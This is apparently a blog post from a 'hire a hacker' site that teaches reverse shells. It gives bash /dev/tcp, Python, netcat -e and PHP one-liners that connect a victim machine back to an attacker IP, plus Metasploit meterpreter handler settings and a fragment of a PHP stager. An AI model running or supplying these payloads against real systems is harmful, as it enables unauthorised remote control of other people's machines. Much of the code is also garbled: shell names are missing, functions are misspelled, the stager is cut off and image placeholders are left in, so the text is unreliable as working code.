Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86382775

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

In our penetration testing process, the most commonly used one is to rebound a shell based on the tcp/udp protocol, that is, reverse connection.

Let’s first talk about what forward and reverse connections are.

Forward connection: Our machine connects to the target machine, such as ssh and mstsc

Reverse connection: The target machine connects our machine

So why is reverse connection more commonly used

The target machine is in the LAN, and we are not able to connect to him

The target machine is a dynamic IP

The target machine has a firewall

Then let me talk about my experimental environment

Attack aircraft: Kali Linux: 47.98.229.211

Victimized machine: Centos 7: 149.129.68.117 (Ali Cloud Server)

Position 1

is also the most common way

Kali Monitor

nc -lvvp 4444centos run

-i /dev/tcp/47.98.229.211/5555 01 After executing the command, it successfully rebounded!请输入图片描述

Position Two python

Attack aircraft Kali or monitor

nc -lvvp 5555centos execution

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('47.98.229.211',27409));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/','-i']);' 请输入图片描述

Pose three nc

If there is nc on the target machine and the -e parameter exists, then a reverse shell can be created

Attack aircraft monitoring

nc -lvvp 5555 target machine execution

nc 47.98.229.211 5555 -t -e /bin/This will bounce the target machine's /bin/to the attack machine

However, many Linux NCs are castrated versions. If the target machine does not have NC or does not have the -e option, it is not recommended to use NC methods.

Pose Four php

Attack aircraft monitoring

nc -lvvp 4444 requires the target machine to have php and then execute

php -r '$sock=fsocopen('172.16.1.130',4444);exec('/bin/sh -i 3 3 23');'

Some other high-energy operations

About PHP payload

Now perform simple configuration in msfconsole

msf use exploit/multi/handler

msf exploit(handler) set payload windows/meterpreter/reverse_tcp

payload=windows/meterpreter/reverse_tcp

msf exploit(handler) set LHOST 192.168.1.107

LHOST=192.168.1.107PHP?

php error_reporting(0); $ip='x.x.x.x'; $port=53; if (($f='stream_socket_client') is_callable($f)) {

{$port}'); $s_type='stream'; } if (!$s ($f='fsocckopen') is_callable($f)) { $s=$f($ip, $port); $s_

strlen($b)); break; case 'socket': $b .=socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock']=$s;

$GLOBALS['msgsock_type']=$s_type; if (extension_loaded('s